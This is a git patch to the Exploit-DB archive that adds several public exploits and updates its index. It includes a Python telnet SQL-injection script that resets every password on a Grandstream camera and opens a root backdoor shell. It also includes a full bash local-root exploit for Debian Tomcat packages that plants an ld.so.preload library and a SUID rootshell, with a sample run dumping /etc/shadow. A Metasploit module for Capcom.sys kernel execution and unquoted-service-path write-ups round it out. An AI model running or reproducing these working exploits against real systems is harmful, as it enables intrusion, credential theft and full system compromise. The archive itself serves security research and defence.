From d9bdc2e376699e861ad6b2cecc33bcfc965b2788 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 4 Oct 2016 05:01:17 +0000 Subject: [PATCH] DB: 2016-10-04 7 new exploits maplab ms4w 2.2.1 - Remote File Inclusion MapLab MS4W 2.2.1 - Remote File Inclusion Gimp 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow Gimp 2.2.14 (Win x86) - '.ras' Download/Execute Buffer Overflow Grandsteam GXV3611_HD - SQL Injection Glassfish Server - Unquoted Service Path Privilege Escalation Windows Firewall Control - Unquoted Service Path Privilege Escalation Android - Insufficient Binder Message Verification Pointer Leak DWebPro 8.4.2 - Multiple Vulnerabilities Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit) --- files.csv | 11 +- platforms/android/dos/40449.txt | 40 +++ platforms/hardware/remote/40441.py | 45 +++ platforms/linux/local/40450.txt | 456 ++++++++++++++++++++++++++++ platforms/win_x86-64/local/40451.rb | 119 ++++++++ platforms/windows/local/40438.txt | 36 +++ platforms/windows/local/40443.txt | 27 ++ platforms/windows/remote/40445.txt | 53 ++++ 8 files changed, 785 insertions(+), 2 deletions(-) create mode 100755 platforms/android/dos/40449.txt create mode 100755 platforms/hardware/remote/40441.py create mode 100755 platforms/linux/local/40450.txt create mode 100755 platforms/win_x86-64/local/40451.rb create mode 100755 platforms/windows/local/40438.txt create mode 100755 platforms/windows/local/40443.txt create mode 100755 platforms/windows/remote/40445.txt diff --git a/files.csv b/files.csv index ddfb923d1..c7119fb68 100755 --- a/files.csv +++ b/files.csv @@ -3302,7 +3302,7 @@ id,file,description,date,author,platform,type,port 3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote,0 3635,platforms/windows/remote/3635.txt,"Microsoft Windows XP - Animated Cursor '.ani' Remote Overflow (2)",2007-04-01,"Trirat Puttaraksa",windows,remote,0 3636,platforms/windows/remote/3636.txt,"Microsoft Windows - Animated Cursor '.ani' Remote Exploit (eeye patch Bypass)",2007-04-01,jamikazu,windows,remote,0 -3638,platforms/php/webapps/3638.txt,"maplab ms4w 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,php,webapps,0 +3638,platforms/php/webapps/3638.txt,"MapLab MS4W 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,php,webapps,0 3639,platforms/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 - 'cid' SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0 3640,platforms/php/webapps/3640.txt,"PHP-Fusion Module Arcade 1.0 - 'cid' SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0 3641,platforms/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 - Remote File Inclusion",2007-04-02,"Hamid Ebadi",php,webapps,0 @@ -3548,7 +3548,7 @@ id,file,description,date,author,platform,type,port 3885,platforms/php/webapps/3885.txt,"telltarget 1.3.3 - (tt_docroot) Remote File Inclusion",2007-05-09,GoLd_M,php,webapps,0 3886,platforms/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - (print.php news_id) SQL Injection",2007-05-09,Silentz,php,webapps,0 3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - (search.php search) SQL Injection",2007-05-09,Silentz,php,webapps,0 -3888,platforms/windows/local/3888.c,"Gimp 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0 +3888,platforms/windows/local/3888.c,"Gimp 2.2.14 (Win x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0 3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow (PoC)",2007-05-09,callAX,windows,dos,0 3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 - RControl.dll Denial of Service",2007-05-10,shinnai,windows,dos,0 3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 @@ -36220,6 +36220,7 @@ id,file,description,date,author,platform,type,port 39922,platforms/osx/dos/39922.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0 39923,platforms/osx/dos/39923.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos,0 39924,platforms/osx/dos/39924.c,"Apple Mac OSX - Kernel Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0 +40441,platforms/hardware/remote/40441.py,"Grandsteam GXV3611_HD - SQL Injection",2016-09-29,pizza1337,hardware,remote,0 39925,platforms/osx/dos/39925.c,"Apple Mac OSX - Kernel Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos,0 39926,platforms/osx/dos/39926.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos,0 39927,platforms/osx/dos/39927.c,"Apple Mac OSX - Kernel OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0 @@ -36561,5 +36562,11 @@ id,file,description,date,author,platform,type,port 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0 40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0 +40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0 40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0 40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege",2016-09-30,Tulpa,windows,local,0 +40443,platforms/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,windows,local,0 +40449,platforms/android/dos/40449.txt,"Android - Insufficient Binder Message Verification Pointer Leak",2016-10-03,"Google Security Research",android,dos,0 +40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0 +40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0 +40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0 diff --git a/platforms/android/dos/40449.txt b/platforms/android/dos/40449.txt new file mode 100755 index 000000000..d0712a715 --- /dev/null +++ b/platforms/android/dos/40449.txt @@ -0,0 +1,40 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=860 + +When frameworks/native/libs/binder/Parcel.cpp reads e.g. a string from a parcel, it does not verify that the string doesn't overlap with any byte range that was tagged as a binder object by the sender. When an attacker sends a parcel to a victim process that contains an unexpected binder handle referring to an object from the victim process where string data is expected, the kernel replaces the attacker-specified handle with a pointer to the object in the victim process. The victim then treats that pointer as part of the attacker-supplied input data, possibly making it available to the attacker at a later point in time. + +One example of such an echo service is the "clipboard" service: Strings written using setPrimaryClip() can be read back using getPrimaryClip(). + +A PoC that leaks the addresses of the "permission", "package" and "clipboard" services from system_server is attached (source code and apk). + +Its logcat output looks like this: + +=============== +[...] +01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2a85 +01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 7362 +01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 17f +01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0 +01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: fd80 +01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 367b +01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71 +01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0 +01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 4c0 +01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2964 +01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71 +01-15 05:20:54.530 19158-19158/com.google.jannh.pointerleak E/leaker: == service "permission" == + type: BINDER_TYPE_BINDER + object: 0x000000712967e260 + + == service "package" == + type: BINDER_TYPE_BINDER + object: 0x000000712963cfc0 + + == service "clipboard" == + type: BINDER_TYPE_BINDER + object: 0x00000071367bfd80 +=============== + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40449.zip + diff --git a/platforms/hardware/remote/40441.py b/platforms/hardware/remote/40441.py new file mode 100755 index 000000000..b80f04a07 --- /dev/null +++ b/platforms/hardware/remote/40441.py @@ -0,0 +1,45 @@ +# Exploit Title: Grandstream GXV3611_HD Telnet SQL Injection and backdoor command +# Exploit Author: pizza1337 +# Vendor Homepage: http://www.grandstream.com/ +# Version: GXV3611_HD Core 1.0.3.6, 1.0.4.3 +# GXV3611IR_HD Core 1.0.3.5 +# Tested on: +# -GXV3611_HD +# Bootloader Version: 1.0.0.0 +# Core Version: 1.0.4.3 +# Base Version: 1.0.4.43 +# Firmware Version: 1.0.4.43 +# -GXV3611IR_HD +# Bootloader Version: 1.0.3.5 +# Core Version: 1.0.3.5 +# Base Version: 1.0.3.5 +# Firmware Version: 1.0.3.5 +# CVE : CVE-2015-2866 +# Category: remote +# More information: +# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2866 +# https://www.kb.cert.org/vuls/id/253708 +# Description: +# http://boredhackerblog.blogspot.com/2016/05/hacking-ip-camera-grandstream-gxv3611hd.html +import telnetlib +import sys + +if len(sys.argv) < 2: + print "USAGE: python %s IP_ADDRESS"%sys.argv[0] + quit() + +conn = telnetlib.Telnet(sys.argv[1]) +conn.read_until("Username: ") +conn.write("';update user set password='a';--\r\n") #This changes all the passwords to a, including the admin password +conn.read_until("Password: ") +conn.write("nothing\r\n") +conn.read_until("Username: ") +conn.write("admin\r\n") +conn.read_until("Password: ") +conn.write("a\r\n") #Login with the new password +conn.read_until("> ") +conn.write("!#/ port lol\r\n") #Backdoor command triggers telnet server to startup. For some reason, typing "!#/ port" does not seem to work. +conn.read_until("> ") +conn.write("quit\r\n") +conn.close() +print "Telnet into port 20000 with username root and no password to get shell" #There is no login password \ No newline at end of file diff --git a/platforms/linux/local/40450.txt b/platforms/linux/local/40450.txt new file mode 100755 index 000000000..7024448e1 --- /dev/null +++ b/platforms/linux/local/40450.txt @@ -0,0 +1,456 @@ +============================================= +- Discovered by: Dawid Golunski +- http://legalhackers.com +- dawid (at) legalhackers.com + +- CVE-2016-1240 +- Release date: 30.09.2016 +- Revision: 1 +- Severity: High +============================================= + + +I. VULNERABILITY +------------------------- + +Apache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation + +Affected debian packages: + +Tomcat 8 <= 8.0.36-2 +Tomcat 7 <= 7.0.70-2 +Tomcat 6 <= 6.0.45+dfsg-1~deb8u1 + +Ubuntu systems are also affected. See section VII. for details. +Other systems using the affected debian packages may also be affected. + + +II. BACKGROUND +------------------------- + +"The Apache Tomcat® software is an open source implementation of the +Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket +technologies. The Java Servlet, JavaServer Pages, Java Expression Language +and Java WebSocket specifications are developed under the Java Community +Process. + +The Apache Tomcat software is developed in an open and participatory +environment and released under the Apache License version 2. +The Apache Tomcat project is intended to be a collaboration of the +best-of-breed developers from around the world. + +Apache Tomcat software powers numerous large-scale, mission-critical web +applications across a diverse range of industries and organizations. +Some of these users and their stories are listed on the PoweredBy wiki page. +" + +http://tomcat.apache.org/ + + +III. INTRODUCTION +------------------------- + +Tomcat (6, 7, 8) packages provided by default repositories on Debian-based +distributions (including Debian, Ubuntu etc.) provide a vulnerable +tomcat init script that allows local attackers who have already gained access +to the tomcat account (for example, by exploiting an RCE vulnerability +in a java web application hosted on Tomcat, uploading a webshell etc.) to +escalate their privileges from tomcat user to root and fully compromise the +target system. + +IV. DESCRIPTION +------------------------- + +The vulnerability is located in the tomcat init script provided by affected +packages, normally installed at /etc/init.d/tomcatN. + +The script for tomcat7 contains the following lines: + +-----[tomcat7]---- + +# Run the catalina.sh script as a daemon +set +e +touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out +chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out + +-------[eof]------ + +Local attackers who have gained access to the server in the context of the +tomcat user (for example, through a vulnerability in a web application) would +be able to replace the log file with a symlink to an arbitrary system file +and escalate their privileges to root once Tomcat init script (running as root) +re-opens the catalina.out file after a service restart, reboot etc. + +As attackers would already have a tomcat account at the time of exploitation, +they could also kill the tomcat processes to introduce the need for a restart. + + +V. PROOF OF CONCEPT EXPLOIT +------------------------- + +------[ tomcat-rootprivesc-deb.sh ]------ + +#!/bin/bash +# +# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit +# +# CVE-2016-1240 +# +# Discovered and coded by: +# +# Dawid Golunski +# http://legalhackers.com +# +# This exploit targets Tomcat (versions 6, 7 and 8) packaging on +# Debian-based distros including Debian, Ubuntu etc. +# It allows attackers with a tomcat shell (e.g. obtained remotely through a +# vulnerable java webapp, or locally via weak permissions on webapps in the +# Tomcat webroot directories etc.) to escalate their privileges to root. +# +# Usage: +# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] +# +# The exploit can used in two ways: +# +# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly +# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. +# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up +# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.) +# +# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to +# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. +# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a +# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can +# then add arbitrary commands to the file which will be executed with root privileges by +# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default +# Ubuntu/Debian Tomcat installations). +# +# See full advisory for details at: +# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html +# +# Disclaimer: +# For testing purposes only. Do no harm. +# + +BACKDOORSH="/bin/bash" +BACKDOORPATH="/tmp/tomcatrootsh" +PRIVESCLIB="/tmp/privesclib.so" +PRIVESCSRC="/tmp/privesclib.c" +SUIDBIN="/usr/bin/sudo" + +function cleanexit { + # Cleanup + echo -e "\n[+] Cleaning up..." + rm -f $PRIVESCSRC + rm -f $PRIVESCLIB + rm -f $TOMCATLOG + touch $TOMCATLOG + if [ -f /etc/ld.so.preload ]; then + echo -n > /etc/ld.so.preload 2>/dev/null + fi + echo -e "\n[+] Job done. Exiting with code $1 \n" + exit $1 +} + +function ctrl_c() { + echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." + cleanexit 0 +} + +#intro +echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n" +echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m" + +# Args +if [ $# -lt 1 ]; then + echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n" + exit 3 +fi +if [ "$2" = "-deferred" ]; then + mode="deferred" +else + mode="active" +fi + +# Priv check +echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`" +id | grep -q tomcat +if [ $? -ne 0 ]; then + echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n" + exit 3 +fi + +# Set target paths +TOMCATLOG="$1" +if [ ! -f $TOMCATLOG ]; then + echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n" + exit 3 +fi +echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG" + +# [ Deferred exploitation ] + +# Symlink the log file to /etc/default/locale file which gets executed daily on default +# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am. +# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been +# restarted and file owner gets changed. +if [ "$mode" = "deferred" ]; then + rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG + if [ $? -ne 0 ]; then + echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink." + cleanexit 3 + fi + echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`" + echo -e "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`" + echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot" + echo -ne "\n you'll be able to add arbitrary commands to the file which will get executed with root privileges" + echo -ne "\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\n\n" + exit 0 +fi + +# [ Active exploitation ] + +trap ctrl_c INT +# Compile privesc preload library +echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" +cat <<_solibeof_>$PRIVESCSRC +#define _GNU_SOURCE +#include +#include +#include +#include +uid_t geteuid(void) { + static uid_t (*old_geteuid)(); + old_geteuid = dlsym(RTLD_NEXT, "geteuid"); + if ( old_geteuid() == 0 ) { + chown("$BACKDOORPATH", 0, 0); + chmod("$BACKDOORPATH", 04777); + unlink("/etc/ld.so.preload"); + } + return old_geteuid(); +} +_solibeof_ +gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl +if [ $? -ne 0 ]; then + echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." + cleanexit 2; +fi + +# Prepare backdoor shell +cp $BACKDOORSH $BACKDOORPATH +echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" + +# Safety check +if [ -f /etc/ld.so.preload ]; then + echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." + cleanexit 2 +fi + +# Symlink the log file to ld.so.preload +rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG +if [ $? -ne 0 ]; then + echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink." + cleanexit 3 +fi +echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`" + +# Wait for Tomcat to re-open the logs +echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..." +echo -e "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)" +while :; do + sleep 0.1 + if [ -f /etc/ld.so.preload ]; then + echo $PRIVESCLIB > /etc/ld.so.preload + break; + fi +done + +# /etc/ld.so.preload file should be owned by tomcat user at this point +# Inject the privesc.so shared library to escalate privileges +echo $PRIVESCLIB > /etc/ld.so.preload +echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`" +echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" +echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" + +# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) +echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" +sudo --help 2>/dev/null >/dev/null + +# Check for the rootshell +ls -l $BACKDOORPATH | grep rws | grep -q root +if [ $? -eq 0 ]; then + echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" + echo -e "\n\033[94mPlease tell me you're seeing this too ;) \033[0m" +else + echo -e "\n[!] Failed to get root" + cleanexit 2 +fi + +# Execute the rootshell +echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n" +$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" +$BACKDOORPATH -p + +# Job done. +cleanexit 0 + +--------------[ EOF ]-------------------- + + + +Example exploit run: +~~~~~~~~~~~~~~ + +tomcat7@ubuntu:/tmp$ id +uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7) + +tomcat7@ubuntu:/tmp$ lsb_release -a +No LSB modules are available. +Distributor ID: Ubuntu +Description: Ubuntu 16.04 LTS +Release: 16.04 +Codename: xenial + +tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat +ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries +ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine +ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files + +tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out + +Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit +CVE-2016-1240 + +Discovered and coded by: + +Dawid Golunski +http://legalhackers.com + +[+] Starting the exploit in [active] mode with the following privileges: +uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7) + +[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out + +[+] Compiling the privesc shared library (/tmp/privesclib.c) + +[+] Backdoor/low-priv shell installed at: +-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh + +[+] Symlink created at: +lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload + +[+] Waiting for Tomcat to re-open the logs/Tomcat service restart... +You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;) + +[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: +-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload + +[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload + +[+] The /etc/ld.so.preload file now contains: +/tmp/privesclib.so + +[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! + +[+] Rootshell got assigned root SUID perms at: +-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh + +Please tell me you're seeing this too ;) + +[+] Executing the rootshell /tmp/tomcatrootsh now! + +tomcatrootsh-4.3# id +uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7) +tomcatrootsh-4.3# whoami +root +tomcatrootsh-4.3# head -n3 /etc/shadow +root:$6$oaf[cut]:16912:0:99999:7::: +daemon:*:16912:0:99999:7::: +bin:*:16912:0:99999:7::: +tomcatrootsh-4.3# exit +exit + +[+] Cleaning up... + +[+] Job done. Exiting with code 0 + + + +VI. BUSINESS IMPACT +------------------------- + +Local attackers who have gained access to tomcat user account (for example +remotely via a vulnerable web application, or locally via weak webroot perms), +could escalate their privileges to root and fully compromise the affected system. + + +VII. SYSTEMS AFFECTED +------------------------- + +The following Debian package versions are affected: + +Tomcat 8 <= 8.0.36-2 +Tomcat 7 <= 7.0.70-2 +Tomcat 6 <= 6.0.45+dfsg-1~deb8u1 + +A more detailed lists of affected packages can be found at: + +Debian: +https://security-tracker.debian.org/tracker/CVE-2016-1240 + +Ubuntu: +http://www.ubuntu.com/usn/usn-3081-1/ + +Other systmes that use Tomcat packages provided by Debian may also be affected. + + +VIII. SOLUTION +------------------------- + +Debian Security Team was contacted and has fixed affected upstream packages. +Update to the latest tomcat packages provided by your distribution. + +IX. REFERENCES +------------------------- + +http://legalhackers.com + +http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html + +The exploit's sourcecode +http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh + +CVE-2016-1240 +http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240 + +Ubuntu Security Notice USN-3081-1: +http://www.ubuntu.com/usn/usn-3081-1/ + +Debian Security Advisory DSA-3669-1 (tomcat7): +https://lists.debian.org/debian-security-announce/2016/msg00249.html +https://www.debian.org/security/2016/dsa-3669 + +Debian Security Advisory DSA-3670-1 (tomcat8): +https://www.debian.org/security/2016/dsa-3670 + +https://security-tracker.debian.org/tracker/CVE-2016-1240 + + +X. CREDITS +------------------------- + +The vulnerability has been discovered by Dawid Golunski +dawid (at) legalhackers (dot) com +http://legalhackers.com + +XI. REVISION HISTORY +------------------------- + +30.09.2016 - Advisory released + +XII. LEGAL NOTICES +------------------------- + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. I accept no +responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file diff --git a/platforms/win_x86-64/local/40451.rb b/platforms/win_x86-64/local/40451.rb new file mode 100755 index 000000000..c24153561 --- /dev/null +++ b/platforms/win_x86-64/local/40451.rb @@ -0,0 +1,119 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/post/windows/reflective_dll_injection' +require 'rex' + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking + + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Process + include Msf::Post::Windows::ReflectiveDLLInjection + + def initialize(info={}) + super(update_info(info, { + 'Name' => 'Windows Capcom.sys Kernel Execution Exploit (x64 only)', + 'Description' => %q{ + This module abuses the Capcom.sys kernel driver's function that allows for an + arbitrary function to be executed in the kernel from user land. This function + purposely disables SMEP prior to invoking a function given by the caller. + This has been tested on Windows 7 x64. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'TheWack0lian', # Issue discovery + 'OJ Reeves' # exploit and msf module + ], + 'Arch' => [ ARCH_X86_64], + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => { + 'EXITFUNC' => 'thread', + }, + 'Targets' => [ + [ 'Windows x64 (<= 8)', { 'Arch' => ARCH_X86_64 } ] + ], + 'Payload' => { + 'Space' => 4096, + 'DisableNops' => true + }, + 'References' => [ + ['URL', 'https://twitter.com/TheWack0lian/status/779397840762245124'] + ], + 'DisclosureDate' => 'Jan 01 1999', # non-vuln exploit date + 'DefaultTarget' => 0 + })) + end + + def check + if sysinfo['OS'] !~ /windows 7/i + return Exploit::CheckCode::Unknown + end + + if sysinfo['Architecture'] =~ /(wow|x)64/i + arch = ARCH_X86_64 + else + return Exploit::CheckCode::Safe + end + + file_path = expand_path('%windir%') << '\\system32\\capcom.sys' + return Exploit::CheckCode::Safe unless file_exist?(file_path) + + # TODO: check for the capcom.sys driver and its version. + return Exploit::CheckCode::Appears + end + + def exploit + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + check_result = check + if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown + fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') + end + + if sysinfo['Architecture'] =~ /wow64/i + fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session') + elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86 + fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') + end + + print_status('Launching notepad to host the exploit...') + notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) + begin + process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) + print_good("Process #{process.pid} launched.") + rescue Rex::Post::Meterpreter::RequestError + # Reader Sandbox won't allow to create a new process: + # stdapi_sys_process_execute: Operation failed: Access is denied. + print_status('Operation failed. Trying to elevate the current process...') + process = client.sys.process.open + end + + print_status("Reflectively injecting the exploit DLL into #{process.pid}...") + + library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'capcom_sys_exec', + 'capcom_sys_exec.x64.dll') + library_path = ::File.expand_path(library_path) + + print_status("Injecting exploit into #{process.pid}...") + exploit_mem, offset = inject_dll_into_process(process, library_path) + + print_status("Exploit injected. Injecting payload into #{process.pid}...") + payload_mem = inject_into_process(process, payload.encoded) + + # invoke the exploit, passing in the address of the payload that + # we want invoked on successful exploitation. + print_status('Payload injected. Executing exploit...') + process.thread.create(exploit_mem + offset, payload_mem) + + print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') + end + +end \ No newline at end of file diff --git a/platforms/windows/local/40438.txt b/platforms/windows/local/40438.txt new file mode 100755 index 000000000..1605b3ca8 --- /dev/null +++ b/platforms/windows/local/40438.txt @@ -0,0 +1,36 @@ +# Title: Glassfish Server - Unquoted Service Path Privilege Escalation +# Date: 28/09/2016 +# Author: s0nk3y +# Software link: https://glassfish.java.net/download.html +# Tested: Windows Server 2008 r2 (Metasploitable3) + +1. Description + +Glassfish Server a service with an unquoted service path running with +SYSTEM privileges. +This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. + +2. Proof + +C:\vagrant>sc qc domain1 +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: domain1 + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\glassfish\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe + LOAD_ORDER_GROUP : + TAG : 0 + 